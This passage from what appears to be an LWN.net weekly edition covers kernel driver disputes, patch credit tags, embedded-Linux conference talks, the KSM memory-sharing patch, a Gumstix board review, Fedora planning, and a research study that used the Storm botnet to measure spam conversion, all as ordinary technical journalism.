	current em28xx driver into what you have. It's a huge amount of
	work that no one wants to do and (in this case) with very little
	benefit.


This review notwithstanding, Mauro has indicated that he is not interested in
accepting this patch.  
But rejecting Markus's new driver out of hand might just be a mistake.  There
seems to be little doubt that it has developed well beyond the in-tree
driver; it supports a wider range of devices.  Failure to merge it risks
losing the work that has been done, and, perhaps, losing the future work of
a developer who, for all his faults, is clearly trying to provide a better
experience for Video4Linux users.

Having multiple drivers for the same hardware in the kernel is not an ideal
situation, but it is also not without precedent.
The IDE and parallel ATA subsystems provide
redundant support for a wide range of hardware.  The e1000 and e1000e
drivers had overlapping coverage for some time.  In such cases, the
long-term goal is usually to work toward the removal of one of the
drivers.

So one could make the case for merging the new driver and, eventually,
removing the older one.  In the process, the new driver could receive some
much-needed attention from other developers.  It has coding style and
copyright attribution problems; a quick review has also left your editor
wondering about locking issues.  But such problems are common to drivers
which have spent a lot of time out of tree; they are simply something to
fix.  Meanwhile, this driver contains the result of years of work and
access to the relevant data sheets; freezing it out may not be in the best
interests of kernel developers or users.

		Tracking of testers and bug reporters - a status report


A recurring topic at kernel summits is proper recognition for users who
report bugs and test fixes.  These people help the development process
considerably, but they are far less visible than the developers who are
creating those bugs in the first place.  Since we would like to have more
testers and reporters, it makes sense to reward them in whatever way we
can.  One of the strongest currencies we hold is credit for work done.  So
it stands to reason that crediting those who help the development process
is in the interest of everybody involved.

One mechanism developed for this purpose is a set of tags applied to
patches before they are merged into the mainline.  When a patch fixes a
bug, the user(s) who reported that bug should be credited through the
addition of a Reported-by: tag.  Similarly, testers are credited
with the Tested-by: tag.  As it happens, some developers have
adopted the habit of using Reported-and-tested-by: as a way of
saving valuable newlines in the common case where a user fills both roles.

There is a certain warm feeling that comes with having one's name stored in
a changelog entry in the kernel source repository.  But the amount of
visibility which comes from this event is relatively small.  So your editor
decided to hack up his git data mining utility to track these tags.
Without further ado, here are the top problem reporters and patch testers
for the 2.6.27 development cycle:


All told, there were a total of 205 Reported-by: and 153
Tested-by: credits entered during the 2.6.27 kernel cycle.  This
is arguably a reasonable start for a new tag, but it seems clear that a lot
of problem reporters are not, yet, being credited in this manner.  Your
editor became curious to see just who is taking the time to credit these
people; they, too, deserve some credit.  A bit more script hacking yielded
these tables: 


The end result: Adrian Bunk gave over 20% of the total bug reporting
credits - to himself.  Beyond that, a number of the core developers are
taking at least some time to credit those who report bugs and test
patches.  But, in the end, the 10,628 changesets merged for 2.6.27 probably
contained quite a few more patches which could have carried such tags.  If
the reporting and testing tags are to become truly useful and significant,
they will have to be more universally used.

While your editor was at it, he also collected statistics for
Reviewed-by: tags.  These tags differ in that they are offered by
the reviewer, who thereby states that a reasonably thorough review has been
done and the code has not been found seriously wanting.  Code review is
perennially in short supply in just about any free software project, so,
again, proper credit for reviewers seems like more than just a good idea.
Here's the top 2.6.27 credited reviewers:


If these numbers are to be believed, only 123 reviews were performed over
the 2.6.27 development cycle.  Even the most cynical observer is likely to
agree that a bit more reviewing than that is going on.  Most reviewers do
not offer the associated tag, so their contribution goes unrecorded.  In
particular, Andrew Morton, who seems to review almost every patch which
appears, should be at the top of the above list.

Clearly, the task of ensuring proper credit for testers, bug reporters, and
reviewers is still in its initial stages.  But one has to start somewhere;
this is more information than we had before.  Hopefully, over time, the
habit of crediting those who help with the development process will become
more widespread.  And that, with luck, will encourage more testing and bug
reporting and, as a result, a better kernel.

		NLUUG/ELCE: Embedded devices and free software


On successive days, Harald Welte and David Woodhouse gave different views
of the relationship between embedded companies and the free software
communities whose code the companies are increasingly using.  Their
outlooks were not contradictory, but instead complementary; each came
at the topic from a different direction.  Welte looked mostly at what
companies, particularly chip vendors could do better, while Woodhouse
looked at what things the community could do to improve.  


Welte and Woodhouse spoke at the
co-located NLUUG 
autumn Mobility conference and Embedded Linux
Conference Europe in Ede, the Netherlands, 
November 6 and 7.  The Congrescentrum De
Reehorst facility was excellent, well-suited to an event of this type
which is not surprising as NLUUG has been holding two events there each year
for the last ten years or so.  In addition, the conference was
well-organized and run; clearly displaying the experience that comes from
the 26 years that NLUUG has been in existence.


[ The following covers Welte's presentation, Woodhouse's talk will be
covered in a subsequent article. ]


Welte kicked things off on Thursday with a talk entitled "How chipmakers
should (not) support free software".  As the conference got a bit of a late
start and was already 15
minutes behind at that point, Welte said that he would make the time up
because "everyone can understand gzip compressed speech".  More
seriously, he outlined his experience as a member of the Linux community,
embedded developer, chip manufacturer from his recent work with Via, as
well as a customer of consumer-grade embedded devices for gpl-violations.org; all of which result in 
multiple relevant points of view.


Linux is being found in more and more devices today—some less
than obvious.  Welte listed fairly well-known things like mobile
phones and in-flight entertainment systems, but then noted that there are
DSL Access Multiplexers (e.g. DSLAMs), payphones, ATMs, as well as vending and exercise machines that also
run Linux.


Vendors of those devices are using free and open source software (FOSS)
because of its 
strengths, which he outlined.  There is a great deal of innovative and
creative development done in FOSS because the barriers to entry are fairly
low: the codebase is easy to
read—at least in comparison to closed source—and there are
standard development tools that are freely available.  Because development
is done in the open, developers will be embarrassed if their software
architecture or code is bad.  This also results in better security because of
the code review that takes place.


The outcome of using FOSS this way is that "we should have a perfect
world" 
with tons of embedded products, all secure and maintainable, that allow for
additional or alternate functionality via third parties.  The first of
those, many embedded products, has been achieved, but we are still waiting
for the other two, Welte said.


He contrasted a user's experience with Linux on PCs today with the
experience provided by most embedded devices.  For PCs, you can
download the kernel, build it and it will run, with most hardware
supported.  You can choose from multiple distributions, any of which will
have a kernel close 
to that of a mainline kernel and provide regular security updates.  These are
"things we are used to for many years", but things are not
that way in the embedded space.


In the embedded world, every CPU or system-on-a-chip (SoC) has its
own kernel tree, typically based on some ancient version of the kernel,
that never gets cleaned up or submitted for mainline inclusion.  So, they
get no benefit from new features or security fixes in the kernel.  There
are no distributions to choose from, either for users or board
makers and, even if updates are generated, there is generally no packaging
system to use to 
update the code; re-flashing the entire device is required.


In Welte's words, "this sucks!"  The embedded vendors get
unstable and unmaintainable software with "security
nightmares" and no 
innovation from elsewhere.  The vendors have kernels that have diverged so
far from the mainline that new features or fixes can't be backported, nor
can their kernels get merged upstream.  This is because the vendors tend to
be very short-sighted, only focusing on getting one particular device out
the door.   


From Welte's perspective, embedded vendors do not understand the real
potential of FOSS.  They do not 
think in terms of creating platforms that others can build atop.  In
general, "they would rather sell a new [device] rather than improve
the existing one".  So, the vendors compete on the basis of the
features their proprietary
competitors implement rather than figuring out how to take advantage of the
true strengths of FOSS.  If, instead, they used FOSS to its fullest, they could
outcompete the proprietary 
vendors in ways that could not be matched—except by using FOSS.


Turning to the chip vendors, Welte points out that there are two types of
customers: Linux-aware and Linux-unaware.  The Linux-aware
customers—whose numbers are growing—will
seek out vendors whose Linux support is better.  It is already relatively 
late in the game: "if you don't have proper FOSS support, you will
lose the 'openness competition'".


Chip manufacturers should be engaging in "sustainable
development" by releasing kernels developed against the mainline in
cooperation with the community.  One large mistake these vendors make is to
think their customers are only the tier-one companies that buy chips
directly.  There are many more downstream users of a chip once it has been
integrated into other hardware; the buyers of those devices are also
important as they will determine the success or failure of the product.


Unsurprisingly, Welte recommends that the development be done in the open,
with a public development tree.  Releases should not just be stable
snapshots or big code drops; "post early, post often" should
be the governing principle.  FOSS is not just a technology, as chip vendors
tend to think, it is a research and development philosophy that needs to be
integrated into both the internal and external processes of the chip vendor.


On the external side, making documentation available, without a
non-disclosure agreement (NDA)—or at worst a FOSS-friendly
NDA—is essential.  Internally, there is normally quite a bit of
learning required to understand the FOSS philosophy.  This will require
training for engineers as well as product management folks.
Having a clear FOSS support strategy, with clear goals, is important
for making it work.


Product management needs to understand that supporting Linux is mostly a
process of understanding the development model.  The Linux APIs are not a
particularly big hurdle, but understanding the community and how to work
within it can be.  Supporting Linux should mean supporting the mainline,
not just N distributions, as N will grow over time, which leads to more
problems. It is important to recognize that
Linux-aware customers care as much about the quality of the code as they do
about price and performance.


Engineering management needs to encourage engineers to communicate with the
community, which requires real internet access.  When faced with adding
functionality to some FOSS code, they should be looking at ways to
cooperate with others who have similar needs, rather than reinventing the
wheel. Engineers need to figure out how and where
to ask the right kinds of questions.  They also need to learn that code is
written to be read, not just executed; "this is something new to many
people". 


The community also has responsibilities to help the chip makers by
providing "non-partisan" documentation because these manufacturers often
have "no 
clue where to start or who to talk to" when they start considering
supporting Linux.  Commercial embedded distributors have a different
perspective from the community so documentation from the community
viewpoint is required.  Welte says that various Linux Foundation sponsored
efforts are helping in this area, but more needs to be done.
A mentoring program of some sort might
help by having FOSS developers willing to work with engineers to walk them
through the process of getting their code upstream.
The community must also work to keep from scaring chip vendor
engineers away by being overly rude or terse;  it is important that
valid criticism be fully explained. 


Welte sees a number of current or looming problems for chip vendors in
supporting 
Linux, mostly involving patents or technology licensing issues.  Various
licensing regimes (like those for MPEG or Sony's memory stick) impose
requirements that essentially preclude the development of free software
drivers to talk to devices that implement those technologies.  Everyone in
the industry has these problems, though, so Welte suggests that they band
together to present a case to the license holders; with enough smaller
players working together, their voice can be heard.


On the whole, Welte is somewhat pessimistic about where embedded devices
are headed.  He certainly sees more FOSS being used in devices in the
future, but expects to see them still be restricted so that they cannot
leverage the full potential of FOSS.  He does see "some very dim
light at the end of a very far tunnel" with projects like Openmoko,
but also efforts by some chip vendors, notably Intel, to fully support Linux.


It was not that many years ago when the desktop Linux situation looked as
bleak as the embedded space does today, so there is hope.  Presentations
like Welte's can only help to bring that about.  The audience contained
many embedded developers, hopefully they can help their company's
management see the benefits that Welte outlines so that his perfect world
comes about sooner, but if the desktop is any guide, it will come about
eventually. 


		/dev/ksm: dynamic memory sharing


The kernel generally goes out of its way to share identical memory pages between
processes.  Program text is always shared, for example.  But writable pages
will also be shared between processes when the kernel knows that the
contents of the memory are the same for all processes involved.  When a
process calls fork(), all writable pages are turned into
copy-on-write (COW) pages and shared between the parent and child.  As long
as neither process modified the contents of any given page, that sharing
can continue, with a corresponding reduction in memory use.

Copy-on-write with fork() works because the kernel knows that each
process expects to find the same contents in those pages.  When the kernel
lacks that knowledge, though, it will generally be unable to arrange
sharing of identical pages.  One might not think that this would ordinarily
be a problem, but the KVM developers have come up with a couple of
situations where this kind of sharing opportunity might come about.  Your
editor cannot resist this case proposed by
Avi Kivity:


	Consider the typical multiuser gnome minicomputer with all 150
	users reading lwn.net at the same time instead of working.  You
	could share the firefox rendered page cache, reducing memory
	utilization drastically.


Beyond such typical systems, though, consider the case of a host running a
number of virtualized guests.  Those guests will not share a process-tree
relationship which makes the sharing of pages between them easy, but they
may well be using a substantial portion of their memory to hold identical
contents.  If that host could find a way to force the sharing of pages with
identical contents, it should be able to make much better use of its memory
and, as a result, run more guests.
This is the kind of thing which gets the attention of virtualization
developers.  So the hackers at Qumranet Red Hat (Izik
Eidus, Andrea Arcanageli, and Chris Wright in particular) have put
together a mechanism to make that kind of sharing happen.  The resulting
code, called KSM, was recently posted for wider review.

KSM takes the form of a device driver for a single, virtual device:
/dev/ksm.  A process which wants to take part in the page sharing
regime can open that device and register (with an ioctl() call) a
portion of its address space with the KSM driver.  Once the page sharing
mechanism is turned on (via another ioctl()), the kernel will
start looking for pages to share.

The algorithm is relatively simple.  The KSM driver, inside a kernel
thread, picks one of the memory regions registered with it and start
scanning over it.  For each page which is resident in memory, KSM will
generate an SHA1 hash of the page's contents.  That hash will then be used
to look up other pages with the same hash value.  If a subsequent
memcmp() call shows that the contents of the pages are truly
identical, all processes with a reference to the scanned page will be
pointed (in COW mode) to the other one, and the redundant page will be
returned to the system.  As long as nobody modifies the page, the sharing
can continue; once a write operation happens, the page will be copied and
the sharing will end.

The kernel thread will scan up to a maximum number of pages before going to
sleep for a while.  Both the number of pages to scan and the sleep period
are passed in as parameters to the ioctl() call which starts
scanning.  A user-space control process can also pause scanning via another
ioctl() call.

The initial response to the patch from
Andrew Morton was not entirely enthusiastic:


	The whole approach seems wrong to me.  The kernel lost track of
	these pages and then we run around post-facto trying to fix that up
	again.  Please explain (for the changelog) why the kernel cannot
	get this right via the usual sharing, refcounting and COWing
	approaches.


The answer from Avi Kivity was reasonably
clear:


	For kvm, the kernel never knew those pages were shared.  They are
	loaded from independent (possibly compressed and encrypted) disk
	images.  These images are different; but some pages happen to be
	the same because they came from the same installation media.


Izik Eidus adds that, with this patch, a
host running a bunch of Windows guests is able to overcommit its memory
300% without terribly ill effects.  This technique, it seems, is especially
effective with Windows guests: Windows apparently zeroes all freed memory,
so each guest's list of free pages can be coalesced down to a single,
shared page full of zeroes.

What has not been done (or, at least, not posted) is any sort of
benchmarking of the impact KSM has on a running system.  The scanning,
hashing, and comparing of pages will require some CPU time, and it is
likely to have noticeable cache effects as well.  If you are trying to run
dozens of Windows guests, cache effects may well be relatively low on your
list of problems.  But that cost may be sufficient to prevent the more
general use of KSM, even though systems which are not using virtualization
at all may still have a lot of pages with identical contents.

		The Gumstix Overo - a miniature X Window System platform


Attendees at this year's Kernel
Summit were treated to
an early prototype version of the Gumstix
Overo
miniature Linux-powered cpu board on top of the Overo Buddy motherboard.
The system packs all of the functions of a desktop computer onto a
platform that is slightly larger than a credit card.


The

Specifications for the Overo processor board include:

A 600 MHz Texas Instruments OMAP 3503 processor.
 256 MB of DDR RAM.
 256 MB of NAND Flash RAM.
 A microSD adapter slot with a 2.0 GB memory stick.
 WiFi and Bluetooth ports.
 A USB 2.0 port.
 Stereo Audio input and output ports.
 A port for driving a graphical LCD panel.
 An assortment of Analog and Digital I/O ports.

The Overo Buddy motherboard adds even more functionality including
a digital video (DVI) controller and two more USB ports.


Upon receiving the Overo Buddy board, the only way to establish
a connection was via an emulated serial connection over
one of the USB ports using the provided USB cable, as explained

here.  This worked as advertised, it was possible to watch
the system boot up and then log into a root shell.
At this point, your author decided to try the installation of
the latest software on the removable microSD memory.
As directed by the
instructions,
the software image was downloaded and installed on the memory
using another machine and the provided microSD adapter card.
Again, this proceeded without any problems and the machine
booted with the new image.


Running the full X  environment required purchasing
a USB hub, a USB keyboard and mouse, an assortment of USB cables
and a Mini DVI to DVI adapter for the monitor connection.
The Mini DVI adapter was a bit wide, and the strain relief around
the Overo Buddy's power supply connector had to be clipped off
to allow the two connectors to be plugged in at the same time.


Getting the USB cabling right was a bit of a challenge.
On the first attempt, the DVI monitor showed an X login window,
but the keyboard and mouse were not active.  Digging through
the documentation revealed the source of the problem.
The OTG USB port needed a type A cable and your author was using a
type B cable.
The Wikipedia USB
documentation was consulted, and your author used a special surface
mount soldering iron to create a tiny solder jumper between pins
4 and 5 of the Overo Buddy's micro-USB jack, simulating the correct
cable. Upon booting, the keyboard and mouse came to life.


When logging into the Overo's X Window System, one is presented with
the simple but effective
Enlightenment
window manager.
Applications include the typical collection of an
X terminal, a file manager, a text editor (gpe_edit)
the Midori
web browser, a mail client, an instant messenger client,
and a selection of four games.  Also included are the
AbiWord word processor,
the Gnumeric
spread sheet and basic  audio record and play utilities.
A large collection of GUI-based admin tools and window system
configuration tools are available.  Both ssh and scp are also
installed on the system, so secure network connections are possible.
Unfortunately, both the audio
recorder and player froze up during basic tests, and their windows
did not go away until the system was rebooted, this appears to
be some kind of audio hardware issue.


The next step to having a functioning system would be to have
some kind of networking.  The Overo processor has built-in
802.11 wireless networking and Bluetooth, but neither of those
systems functioned.  That is a known issue with some of the
early-run prototype boards.  One still has the option of
adding USB WiFi and Ethernet boards to the Overo,
several devices are supported natively.
Once networking can be established, it should be possible to
use the network-based applications, transfer user data add more
application packages.


Having so much functionality in something as tiny as the Overo Buddy
board seems like an amazing technological feat.  Gumstix has
truly achieved a new milestone in the miniaturization of Linux systems.
Production versions of this system are scheduled for release in
the fourth quarter of 2008.


		Reinventing the Fedora desktop


Now that Fedora 10 is nearing completion, it is time to start looking
forward to the shape of Fedora 11.  Matthias Clasen started a discussion with a post to the
Fedora-desktop list, including a pointer to the whiteboard
where people can fill in their ideas.  The page contains some ideas
guaranteed to warm an editor's heart and a few which inspire rather less
enthusiasm. 

So what are the Fedora desktop people pondering?  Some of the ideas
include:


 Removing icons from the desktop menus.  The reasoning behind
     this change would appear to be "Windows and OS X do it that way."

 Fixing up power management.  Among other things, those posting to the
     wiki note "When the user changes the brightness, he doesn't
     appreciate if the computer turns it right back down again";
     better late than never.  Better power management also involves turning
     off blinking cursors, which would also be a welcome change.

 "Better fonts" is on the list; that seems to translate to better and
     easier ways for users to install new fonts.  There is some wondering
     about whether the current packaging system is really the best way to
     deal with fonts.

 The volume control has been singled out for special attention.  One of
     its claimed problems is the vast number of sliders which can appear
     for a complex audio device; it is true that it can become
     overwhelming.  But playing "find the hidden slider" when some audio
     source is inaudible is not a better state of affairs.  There is also a
     worrisome note to the effect that Windows has a better volume control
     because it is not removable.  So, in the future, we may have a volume
     control whether we want it or not.

 Replacing the panel altogether, along the lines of the
     ideas bashed out at the recent GNOME hackfest, is under
     consideration.  This would, of course, be a major change to the
     desktop which would not be welcomed by all users.

 Somebody has noticed that the flurry of "notification" windows can get
     a little irritating.  So different
     approaches to notifications are being considered.

 A new approach to
     system settings is also under consideration.  The idea would be to
     get away from the "preferences" and "administration" menus in favor
     of a single window with a search feature.

 There is talk of better location awareness, but it appears to be limited
     to mundane tasks like setting the time zone automatically.  It seems
     like it should be possible to set more ambitious goals in this area.

 The Fedora developers note that Ubuntu beat them to shipping a working
     "guest user" implementation.  Surely they will now contribute to
     improving that implementation, rather than making their own...right?

 Evidently users should not be asked to distinguish between hibernating
     the system (which saves memory to disk and powers off) and suspending
     (which keeps main memory powered up).  To avoid this problem, Fedora
     might implement a "hybrid suspend" which saves to disk but still keeps
     RAM energized for a fast restart.  There are a number of practical
     problems to solve in this area, not the least of which being that
     waiting for a full hibernate when you want to suspend the system
     quickly can be obnoxious.

 Fast boot is, naturally, on the list.


There is a lot more on the list - far more than the Fedora developers can
hope to implement (or even integrate) in the near future.  But the process
is a good one, and some of these ideas will certainly show up in future
Fedora releases.  With any luck at all, the Linux desktop will continue to
improve for a long time.

		NLUUG/ELCE: Embedded Linux and the community


As one of two embedded maintainers for the Linux kernel, David Woodhouse is
in an excellent position to see where the community is failing to keep up
its end of the bargain.  At the recent co-located NLUUG and Embedded Linux
conferences, his keynote on the second day made it very clear what areas he
sees that need improvement.  We fairly regularly hear about things that
companies should be doing—see the report on Harald Welte's first day 
keynote—but the community should certainly
keep an eye on its behavior as well.  In his presentation, Woodhouse notes
multiple projects that are not upstreaming their changes; he also notes things
that individuals could do to make Linux better.


He started by pointing out that "it's not entirely clear what
'embedded' means", as there are many kinds of devices that have
embedded attributes.  Things like headless, handheld, low power, small
size, limited ram, or limited persistent storage tend to be a part of the
description of embedded devices, but there is "no real definition
that I'm aware of that makes any sense".


Woodhouse then went on to see if he could define what an "embedded
maintainer" is and does.  He doesn't see the role as chasing patches to get
them included upstream, it is more of an advocate role.  Keeping an eye out
for stupidity in the kernel using Bloatwatch and other tools as well as
encouraging people—in various companies as well as in different parts
of the  
community—to work together on solutions to problems they have in 
common are all part of the job.


From Woodhouse's perspective, companies are "getting a lot
better" in terms of their Linux support.  Less promising is the
community: "We suck, really".  He looked at a number of
community embedded projects—like OpenWrt, Maemo, Moblin, and OLPC—to see how well they work with
upstream; what he found was rather discouraging.


By looking at several concrete criteria, such as how many unsubmitted local
kernel patches there were, how accessible their source is, and how old the
kernel is that the project is using, Woodhouse is judging those projects
the same way that companies are measured.  Of the four projects that he
looked at, only one, OLPC, was "mostly OK", the rest varied
from "less good" to "FAIL".


Moblin for example, only had 23 outstanding patches, but those were against
kernel 2.6.24.  OpenWrt had a better kernel version, 2.6.27, but had 160
outstanding patches, plus an extra 425 files weighing in at 125,000 lines
of code, which prompted a "sorry!" from an OpenWRT developer
in the audience.  OLPC has just a few outstanding patches against 2.6.27.4,
while Woodhouse couldn't even find the kernel source for Maemo.


Getting work upstream is extremely important.  Running older kernels and
backporting fixes and features may seem like it saves time, but "it
never works in the long run, it's a false economy".  Woodhouse
listed the usual suspects as reasons to get things upstream: code review,
compile testing, updates for kernel API changes, and automated bug
checking.  He also mentioned the Kernel Janitors, whose efforts
are generally useful, even though they are "often a little misguided,
sometimes they don't engage their brain before sending patches".
All of these benefits only come from getting code into the mainline.


[PULL QUOTE: 
The theme of the talk is summed up in one statement: "Divergence is
pain"
 END QUOTE]


The theme of the talk is summed up in one statement: "Divergence is
pain".  Any time that your code is not current with the most recent
kernels or your patches are not making their way upstream, it should be felt
as pain because diverging from upstream will end up causing exactly that.
The pain 
may not be felt until later, but Woodhouse wants developers to recognize
the problems caused by divergence so that they are averse to it right from
the start.


Looking at the reasons why code is hoarded is instructive, he says.  One of
the reasons that is often heard, as well as Woodhouse's opinion, are summed
up in a bullet 
point on one of his slides: "too hard to write decent
code get code accepted".  Another reason is that there is
not enough time in the schedule for getting code merged.  Many "see
it as an extra part of the process after the driver is complete",
which is the wrong way to look at it.  Drivers and other features should be
shared early on the appropriate mailing list so that any problems are dealt
with near the beginning of development.


An issue related to code quality is that many times drivers are developed
for ancient versions of the kernel, but that really shouldn't be a barrier
as any "decent code will port relatively easily".  Sometimes
there is resistance to changes by the upstream developers.  An example he
noted was a feature that allowed multicast to be optionally removed from
the IPv4 networking stack.  It saved a fair amount of space for embedded
devices that did not need that functionality, but David Miller and other
networking developers were not very interested.  This is where the embedded
maintainer role can come into play as Woodhouse can step in to try to help
convince the upstream developers.


Woodhouse had specific suggestions for making the situation
better. "For a start, put everything in git trees" as it
allows others to look at and test the code.  Each feature should have its
own topic tree that gets pulled into the main tree and developers should
regularly assess the outstanding code to determine if it is ready to be
moved upstream.  Working with the upstream developers, getting them
involved, and getting them to care about the feature or driver is crucial.
In cases where a logjam develops, call on Woodhouse or Andrew Morton, they
"can't promise any miracles, but often it can help".


Something that Woodhouse would like to see more developers do is to adopt a
driver.  There are countless drivers in SourceForge and elsewhere that are
not upstream, so he suggests that folks "pick one driver, just tidy
it up and make it acceptable upstream".  Incidentally, Woodhouse is
no fan of SourceForge: "I don't think I wrote 'don't use SourceForge'
on any of the slides, but pretend that it's there".  He mentioned
the -staging tree as a possible destination for adopted drivers, though he
is skeptical of the tree, "but it exists, we should see if we can get
something from it".


Woodhouse summed up his talk with a simple statement: "We need to
work better as a community before we can point fingers at companies who
don't play nicely".  It is certainly true that the community needs
to set a good example for companies to follow.  By highlighting some of our
failures, Woodhouse has done the community a great favor, we can
and, with luck, will do better.


		Fedora release cycles: longer or shorter?


The Fedora 10 release is currently planned for November 25 - somewhat later
than had been originally intended.  Delays in Fedora releases are certainly
not unheard-of, even when the project isn't coping with a major compromise
of its fundamental infrastructure (the full story of which, it should be
noted, still has not been told).  Fedora 10 looks like it will be
worth the wait, but the project is not waiting for the release to start
thinking about its upcoming release cycles.  A couple of discussions
related to this topic provide some interesting insights into the pressures
being felt by Fedora's leadership.

A recent video review
of Fedora 10 was seen by the project as being something other than
entirely favorable.  But the biggest
complaint expressed by the project is on a different subject: credit
for work which is done by Fedora developers.  Quoting Fedora leader Paul
Frields:


	Another point that had me scratching my head was the same host
	indicating that Fedora had a lot of features that were in Ubuntu
	8.10.  This is certainly true, but the differentiator is that many
	of these features were *built* by Fedora contributors, inside and
	outside Red Hat.  It's important for us to keep emphasizing this
	fact.


Subsequent discussion indicates that a number of Fedora developers feel
that other distributions - Ubuntu in particular - are stealing Fedora's
thunder by shipping Fedora-developed improvements first.  This is not the
first time this kind of concern has been raised; it has been asserted that
Novell's behind-closed-doors XGL
work was done that way to keep Ubuntu from shipping it first.  Fedora
does not appear to be considering pulling its development from public view
- that would run counter to the project's open nature - but some other
responses are being discussed.


More than anything else, the Fedora project would like to ensure that the
world knows about the work its developers are doing.  Initiatives like the feature
list for each release help to get information out ahead of the actual
software release.  There is also talk of more aggressive blogging, outreach
to news sites, etc.  The project has even posted a proposed
marketing schedule which would help to ensure that all the right
marketing activities are happening at the right points in the release
cycle.

Former Fedora leader Max Spevack had a
different suggestion to offer:


	If "features" and "first" are hurting because of where we are in
	the calendar compared to the Ubuntu release, allowing them the
	chance to release their new distro first and to receive a lot of
	credit for new features when reviewers and press don't understand
	where the upstream work is being done (in Fedora, for example),
	then Fedora Marketing should ask the Fedora Board to think about
	altering our "May Day" and "Halloween" release targets by a little
	bit, so that Fedora's cycle finishes before Ubuntu's.


This proposal brings to mind a vision of distributors racing to be the
first to release, leading to ever-shorter cycles and a corresponding
decrease in release quality.  It is hard to imagine that the first mover
has such an overwhelming marketing advantage; there must be a better way.

It does not look like Fedora will attempt a "first post" counterattack
anytime soon.  In fact, if the recently-posted Fedora 11 release schedule proposal is
adopted, the exact opposite will happen.  In the past, Fedora has responded
to a much-delayed release by shortening the following release cycle in an
attempt to get back on schedule.  For Fedora 11, it would appear that
this will not happen; there will be no attempt to go for a "May Day"
release. 

The reasoning against shortening the Fedora 11 cycle comes down to this:


	Fedora 11 will be extremely important to Red Hat Enterprise Linux
	(otherwise known as RHEL).  RHEL 6 planning has looked to use
	Fedora 10 and Fedora 11 as releases to work out new technologies
	and features that are desired in RHEL 6.  This includes a lot of
	upstream work that is being done, and targeted to land in these two
	releases.


So a shortened Fedora 11 cycle would make it harder to get all of the
changes planned for RHEL6 in.  That's problematic for Red Hat, and, since
Red Hat pays for much of Fedora's existence, Red Hat's problems become
Fedora's problems.  Beyond that, though, it seems that a number of core Red
Hat engineers will be working on Fedora during the next cycle to help get
RHEL6-targeted features into shape.  If the next cycle is shorter, Fedora
will get less attention from those developers.  Fedora would like to avoid
that situation and take advantage of the RHEL team's attention while it
can.

So the proposal is to retain the six-month cycle for Fedora 11 and release
around the beginning of June.  The Fedora 12 cycle, though, would be
shortened to get the project back to the original schedule.  The hope is
that the advance notice will make it easier to plan for a short release
cycle; Jesse Keating also suggests that the project "could even
focus more on polish issues in F12 than large sweeping features."
The more cynically-minded among us might conclude that Fedora 11 will
be stuffed full of bleeding-edge new stuff that the RHEL team wants to
evaluate, and Fedora 12 will be the release where all of that work is
actually stabilized.  But your editor would never want to be cynical.

The initial response to the proposed schedule is almost entirely positive,
so it seems likely that things will go that way.  Some Fedora developers
may feel that releasing behind Ubuntu gives the project a public relations
disadvantage, but other concerns are seen as being more important.  Since
those "other concerns" can be seen as "take the time to focus a lot of work on
pulling together new features for an upcoming stable release," this set of
priorities seems hard to argue with.

		Storm botnet used to study spam


Spam is a problem that all email users suffer from but getting a handle on
the economics of spamming has never been easy.  A group of researchers has
changed that to some extent by publishing a study
[PDF] that looks at the conversion rate of spam emails.  While the methods
they used were somewhat ethically questionable, the data it provides is
quite useful and interesting.


In the study, the Storm botnet's "command and control" (C&amp;C) infrastructure
was infiltrated in such a way
that spam messages sent by Storm worker nodes would point the URLs in the
spam at sites controlled by the researchers.  By doing this, they could
determine how much spam was sent and, more importantly, how much of it was
clicked on.  While sending spam is not very costly, it clearly does not
have a zero cost. This means that—unbelievable though it sometimes
seems—people actually do click through spam emails; not only that,
they actually make purchases from the sites where they land.


The researchers set up fake pharmacy
sites—selling male enhancement products amongst other things—that would be reached
via the spam links.  To protect the spam "victims", a visitor to the site
would be allowed  
to get to the checkout stage before showing a site error.  It seems
plausible that nearly everyone willing to fill their shopping cart with
such products and enter the checkout process is a very likely buyer.
In this way, the study could count not only those who followed the links,
but also those who were likely to buy.


What they found was that of 350 million emails sent—they estimate 82
million actually delivered—ten thousand recipients visited the site
for a click-through rate of 0.003%.  Of those, 28 users actually tried to
check out with products totaling over $2700.  The study was run for 26
days, so this could have resulted in roughly $100 per day of revenue. 


Also of interest were the campaigns that were run to test the propagation
of the Storm malware.  This is normally done by sending spam that directs
users to a website (via a "you have received a postcard" message) and
entices them into clicking a link that will download and install the
malware.  The percentages of click-throughs were slightly higher
(0.004-0.006%), but a rather large percentage of those (almost 10%)
actually clicked the malware link once they reached the website.  The
researcher's version would download a benign executable, but the clear
implication is that a small, but useful, number of users would actually
add themselves to the botnet more-or-less voluntarily.


While the study is quick to point out that it represents only one data
point, there is some value in extrapolating what the botnet might be able
to generate in terms of revenue: 

          Different campaigns, using different tactics and marketing
different products will undoubtedly produce different outcomes.
Indeed, we caution strongly against researchers using the conversion
rates we have measured for these Storm-based campaigns to 
justify assumptions in any other context. At the same time, it
is tempting to speculate on what the numbers we have measured
might mean. We succumb to this temptation below, with the understanding
that few of our speculations can be empirically validated 
at this time.


The conclusion is that something on the order of $7000-9500 per day could be
generated, which equates to $2.5-3.5 million per year—a tidy sum by any
measure.  There is some additional speculation that because of the retail
cost of 
sending spam (rumored to be something like $80 per million sent), it only
makes sense that the Storm operators and the "pharmacies" are one and the
same.  The sites used for propagation of the Storm malware have 
similarities to those used by the shopping sites, which also indicates a
close association between the two.  The study makes the following, perhaps
overly optimistic, argument:

   If true, this hypothesis is heartening since it suggests that the
third-party retail market for spam distribution has not grown large
or efficient enough to produce competitive pricing and thus, that
profitable spam campaigns require organizations that can assemble
complete "soup-to-nuts" teams. Put another way, the profit margin
for spam (at least for this one pharmacy campaign) may be meager enough
that spammers must be sensitive to the details of how 
their campaigns are run and are economically susceptible to new
defenses.


The full paper is well worth a read for those interested in botnets or
spam, but there are some ethical questions to consider as well.  Is it
reasonable to use other people's computers for your research without their
consent?  There is no easy answer to that question.  The researchers
outline their argument, which boils down to "we strictly reduce
harm".  Because they are just intercepting and modifying orders that
are already 
being sent to workers, their research did not increase the amount of spam
sent, nor did it increase the work that others' computers would do.


Since the spam that they arrange to be sent is harmless—at least in
terms of selling bogus medicine or propagating malware—they have
actually reduced the number of harmful spams sent.  While their arguments
seem at least well-thought-out, it is not something that would be fun to try to
explain to a judge bent on enforcing some of the poorly-thought-out
computer crime statutes.  The researchers seem confident that their methods
will pass muster, though: "We have been careful to design experiments
that we believe are 
both consistent with current U.S. legal doctrine and are fundamentally
ethical as well."


It is difficult to see how this kind of data could be gathered without
co-opting Storm or another spam-sending botnet.  From that standpoint,
the researchers took the only path they could, but they certainly appear to
